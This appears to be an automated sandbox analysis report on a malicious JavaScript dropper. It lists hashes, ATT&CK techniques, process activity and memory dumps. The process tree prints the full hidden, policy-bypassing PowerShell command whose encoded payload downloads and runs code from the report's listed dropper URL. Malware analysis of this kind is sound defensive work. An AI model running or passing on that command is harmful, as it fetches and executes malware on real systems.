1ca7b20941d0f48f412a5980d0e6246ad64f57543b02afbd0d3cbdb260e5d347

Analysis

max time kernel
94s
max time network
202s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
06/01/2024, 07:00

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

459504d2f4911f64112e222ae6c9a239.js
Size

105KB
MD5

459504d2f4911f64112e222ae6c9a239
SHA1

65e5479d82cbd111f2be171f379b3de11be0b265
SHA256

1ca7b20941d0f48f412a5980d0e6246ad64f57543b02afbd0d3cbdb260e5d347
SHA512

bf93d00eacd5154b302d7a681a803162e3e08eb573a140d9629551287450f177ec7dbedb82f1bb61f908861f583fb6e3fe4c2b7caa7ec4b84c8d4c53513e289f
SSDEEP

3072:59Ry98guHVBqqg2bcruzUHmLKeMMU7GwbWBPwVGWl9SZ8kV8Gd5bzIvt/4g5eaXx:59Ry9RuXqW4SzUHmLKeMMU7GwWBPwVGM

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://smart-integrator.hr/pornhub.php

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
98	3580	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation	wscript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
3580	powershell.exe
3580	powershell.exe
3580	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3580	powershell.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 644 wrote to memory of 3532	644	wscript.exe	45
PID 644 wrote to memory of 3532	644	wscript.exe	45
PID 3532 wrote to memory of 3580	3532	cmd.exe	44
PID 3532 wrote to memory of 3580	3532	cmd.exe	44

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\459504d2f4911f64112e222ae6c9a239.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:644
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3532

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA
1⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3580

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3580-1-0x0000021E73F10000-0x0000021E73F32000-memory.dmp

Filesize
136KB

Download
memory/3580-14-0x0000021E73FC0000-0x0000021E73FD0000-memory.dmp

Filesize
64KB

Download
memory/3580-13-0x0000021E73FC0000-0x0000021E73FD0000-memory.dmp

Filesize
64KB

Download
memory/3580-12-0x0000021E73FC0000-0x0000021E73FD0000-memory.dmp

Filesize
64KB

Download
memory/3580-11-0x00007FF93D380000-0x00007FF93DE41000-memory.dmp

Filesize
10.8MB

Download
memory/3580-17-0x00007FF93D380000-0x00007FF93DE41000-memory.dmp

Filesize
10.8MB

Download